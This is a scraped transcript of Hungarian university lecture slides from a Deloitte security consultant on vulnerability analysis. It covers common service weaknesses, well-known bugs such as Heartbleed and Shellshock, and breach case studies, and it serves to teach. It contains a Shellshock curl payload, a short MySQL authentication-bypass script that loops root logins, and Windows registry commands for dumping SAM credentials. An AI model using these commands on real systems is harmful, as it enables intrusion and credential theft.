deloitte elte serulekenysegek...
TRANSCRIPT
![Page 1: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/1.jpg)
Sérülékenység elemzés
Spala FerencDeloitte Zrt.
ELTE IK – 2016
![Page 2: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/2.jpg)
ELTE ProgTervMat (2008)
Senior Manager @ Deloitte
Programbizottság vezető @ Hacktivity
spala.ferenc @ {gmail, facebook}
FerencSpala @ Twitter
securityminutes.com
Bemutatkozás
![Page 3: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/3.jpg)
![Page 4: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/4.jpg)
FogalmakHacker/CrackerFlame!
Fehér/Fekete/Szürke kalapos hackerMédia kompatibilitás RULZ!
Anonymous =? HackerekFlame2
![Page 5: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/5.jpg)
Akkor ki a hacker?„A hacker is someone who thinks outside the
box. It's someone who discards conventional wisdom, and does something else instead. It's someone who looks at the edge and wonders what's beyond. It's someone who sees a set of rules and wonders what happens if you don't follow them. A hacker is someone who experiments with the limitations of systems for intellectual curiosity.” (Bruce Schneier)
![Page 6: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/6.jpg)
Hakcer =? GeekOlvassuk el mégegyszer!
Látsz ott olyat, hogy számítógép, vírus, hálózat, feltörés, jelszó?
Nem attól lesz hacker valaki, mert fel tud törni valamit!
Pláne nem attól, hogy beáll anon-nak!
![Page 7: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/7.jpg)
![Page 8: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/8.jpg)
This%is%hacki
ng!
![Page 9: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/9.jpg)
Hakcer =? GeekMatematikusok fosztottak ki egy amerikai lottót
Index (2011.08.03)… pár matematikus és programozó az MIT-ról összeállt
és elkezdett számolgatni…
Nem, nem csaltak, nem törtek fel semmit, gondolkodtak és rájöttek hol van a kiskapu
Ez a hackelés!
![Page 10: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/10.jpg)
Tanácsadó vs. HackerVan metszet!
Tanácsadó =? Öltönyös hacker
Tanácsadó =? Hacker++
Tanácsadó =? Hacker + kommunikáció
![Page 11: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/11.jpg)
Mindig tudd mire lősz!
![Page 12: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/12.jpg)
![Page 13: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/13.jpg)
Érdekességek
![Page 14: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/14.jpg)
FTP (tcp/21)Titkosítatlan
Anonymous login
Bárki számára írható/olvasható könyvtárak
Backdoor
Buffer overflow
Brute force
On Sunday, the 28th of November 2010 around 20:00 UTC the main distribution server of the ProFTPD project was compromised. The attackers most likely used an unpatched security issue in the FTP daemon to gain access to the server and used their privileges to replace the source files for ProFTPD 1.3.3c with a version which contained a backdoor.
![Page 15: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/15.jpg)
SSH (tcp/22)PermitRootLogin
SSHv1 támogatás
Buffer overflow
Brute force
F5 ships a public/private key pair on BIG-IP appliances that allows passwordless authentication to any other BIG-IP box. Since the key is easily retrievable, an attacker can use it to gain unauthorized remote access as root.
![Page 16: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/16.jpg)
Telnet (tcp/23)Titkosítatlan
Brute force
Buffer overflow
![Page 17: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/17.jpg)
SMTP (tcp/25)Titkosítatlan
Brute force
Buffer overflow
User enumeration (VRFY, EXPN, REPLY-TO)
E-mail relaying
A remote code execution flaw in Exim has been discovered by an internal audit performed by the Exim developers[2]. This vulnerability may lead to arbitrary code execution with the privileges of the user executing the Exim daemon. In some circumstances this may lead to privilege escalation.
![Page 18: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/18.jpg)
DNS (udp/53, tcp/53)Titkosítatlan
Anonymous zóna transzfer
DNS cache poisoning
Dan Kaminsky-féle hiba http://unixwiz.net/techtips/iguide-kaminsky-dns-vuln.html
Buffer overflow
![Page 19: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/19.jpg)
HTTP (tcp/80), HTTPS (tcp/443)Titkosítatlan (HTTP)
HTTP methods (TRACE, PUT, DELETE)
Directory listing
HTTP Parameter Splitting
Buffer overflow
WebDAV (cadaver)
+ Tomcat, Jboss, WebSphere, GlassFish,…+ Webes alkalmazások hibái!
![Page 20: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/20.jpg)
SSL - Apple (iOS)
https://nakedsecurity.sophos.com/2014/02/24/anatomy-of-a-goto-fail-apples-ssl-bug-explained-plus-an-unofficial-patch/
You don't really need an knowledge of C, or even of programming, to understand the error here.
The programmer is supposed to calculate a cryptographic checksum of three data items - the three calls to SSLHashSHA1.update() - and then to call the all-important function sslRawVerify().
If sslRawVerify() succeeds, then err ends up with the value zero, which means "no error", and that's what the SSLVerifySignedServerKeyExchange function returns to say, "All good."
But in the middle of this code fragment, you can see that the programmer has accidentally (no conspiracy theories, please!) repeated the line goto fail;.
The first goto fail happens if the if statement succeeds, i.e. if there has been a problem and therefore err is non-zero.
This causes an immediate "bail with error," and the entire TLS connection fails.
But because of the pecadilloes of C, the second goto fail, which shouldn't be there, always happens if the first one doesn't, i.e. if err is zero and there is actually no error to report.
The result is that the code leaps over the vital call to sslRawVerify(), and exits the function.
This causes an immediate "exit and report success", and the TLS connection succeeds, even though the verification process hasn't actually taken place.
![Page 21: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/21.jpg)
SSL (Heartbleed) - OpenSSL
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet.
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software.
![Page 22: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/22.jpg)
SSL
(Hea
rtble
ed) -
Ope
nSSL
![Page 23: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/23.jpg)
ShellShock
Shellshock (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187) is a vulnerability in GNU's bash shell that gives attackers access to run remote commands on a vulnerable system.
This security vulnerability affects versions 1.14 (released in 1994) to the most recent version 4.3 according to NVD.
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
![Page 24: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/24.jpg)
Oracle (TCP/1521)Titkosítatlan (is lehet)
Gyenge “SYS”/”SYSTEM” jelszó
Jogosultságok
TNS poisoning
“…was fixed in future releases of the product."
![Page 25: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/25.jpg)
TNS POISONING
Listener
tnspoison
Victim
Connect
Resend
Connect
Accept
Authentication
Data
![Page 26: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/26.jpg)
TNS POISONING
Listener
tnspoison
Victim
Connect
Redirect
Regis
ter
Regis
ter
![Page 27: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/27.jpg)
Adatbázisok - MySQL#!/usr/bin/python# This has to be the easiest "exploit" ever. Seriously. # Embarassed to submit this a little.# Title: MySQL Remote Root Authentication Bypass# Written by: Dave Kennedy (ReL1K)# http://www.secmaniac.com## Original advisory here: seclists.org/oss-sec/2012/q2/493import subprocess ipaddr = raw_input("Enter the IP address of the mysql server: ") while 1: subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()
![Page 28: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/28.jpg)
HP Data Protector
![Page 29: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/29.jpg)
![Page 30: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/30.jpg)
Hibajavítás PHP módraCVE-2012-0830: The php_register_variable_ex function in php_variables.c in PHP 5.3.9 allows remote attackers to execute arbitrary code via a request containing a large number of variables, related to improper handling of array variables. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-4885.
![Page 31: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/31.jpg)
Egy példa a múltból - Custom SSO
![Page 32: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/32.jpg)
Egy példa a múltból - Custom SSO
A kliens (böngésző) eldöntheti, hogy ki az authentikációs szerver?!?!
1. Kitalálod mi az authentikációs protokol
2. Csinálsz egy saját “szervert”
3. “Beállítod” a saját szervered az “authCheckSiteServer” paraméter értékének
4. $$ Profit $$
![Page 33: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/33.jpg)
SNMP 2 Domain Admin
![Page 34: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/34.jpg)
SNMP public
![Page 35: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/35.jpg)
SNMP public
![Page 36: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/36.jpg)
![Page 37: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/37.jpg)
Linux post exploitation
![Page 38: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/38.jpg)
Linux post exploitation
![Page 39: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/39.jpg)
Login - Dump - GOTO 1
Password dumpreg save HKLM\security security.regreg save HKLM\system system.regreg save HKLM\sam sam.reg+ secretsdump.py
Metasploit / incognitoMetasploit / mimkatz
![Page 40: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/40.jpg)
Login - Dump - GOTO 1
![Page 41: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/41.jpg)
Érdekességek - Adatlopás383 cég 12 országban
Átlagosan 4M USD veszteségÁtlagosan egy ellopott rekord 158 USD-be került a cégeknekLehet biztosítást kötni adatlopásra!
Az adatlopások/szivárgások 48%-át okozta rosszindulatú támadás
„For our consolidated sample of 350 companies, we estimate a mean time toidentify at 206 days with a range of 20 to 582 days”
Teljes jelentés: http://www-03.ibm.com/security/data-breach/
![Page 42: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/42.jpg)
mail.ru hackA legnagyobb orosz „Internet cég” – email, portálok,
közösségi média, kereső, chat, cloud storage, online játék
25 millió rekordot loptak el 2016 augusztusában (felhasználói név, e-mail, jelszó, születési idő)
cfire.mail.ru – 13 millió (6 millió jelszót feltörtek <1 hónap alatt)
parapa.mail.ru (weboldal) – 5 millió (3 millió jelszót feltörtek <1 hónap alatt)
parapa.mail.ru (fórum) – 4 millió (3 millió jelszót feltörtek <1 hónap alatt)
tanks.mail.ru – 3 millió (0 jelszót törtek fel)
Hogyan jutottak be?• Egy régi vBulletin fórumban találtak SQL injection-t• Publikusan ismert hiba volt
Nem tudni ki volt az…
![Page 43: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/43.jpg)
AshleyMadison
Online társkereső kimondottan olyanoknak, akik félre akarnak lépni – „Life is short. Have an affair.”
Valószínűleg az összes felhasználó adataihoz hozzáfértek – 37 millió rekord
Az oldal azt állította (a hack előtt), hogy egy egyszer $19 díj ellenében a felhasználó adatait végleg törlik
A hack után kiderült, hogy ez nem történt meg• Mellesleg $1.7M bevételük volt ebből a díjból csak 2014-benÉveken keresztül bent lehettek a hálózatukban578 millió USD-re perelték a céget Kanadában amiért nem védték/
törölték megfelelően a személyes adatokatÁllítólag két öngyilkosság is köthető az adatok kiszivárgáshozAz oldal felajánlott $500,000 kanadai dollárt nyomravezetői díjat
![Page 44: Deloitte ELTE serulekenysegek 2016compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg... · distribution server of the ProFTPD project was compromised. The attackers](https://reader031.vdocuments.mx/reader031/viewer/2022022616/5ba3738f09d3f2c0278b7d9f/html5/thumbnails/44.jpg)
Köszönöm a figyelmet!Spala FerencSenior ManagerDeloitte Zrt.
spala.ferenc @ {gmail, facebook}FerencSpala @ Twittersecurityminutes.com
Feedback form: http://compalg.inf.elte.hu/~attila/Teaching.html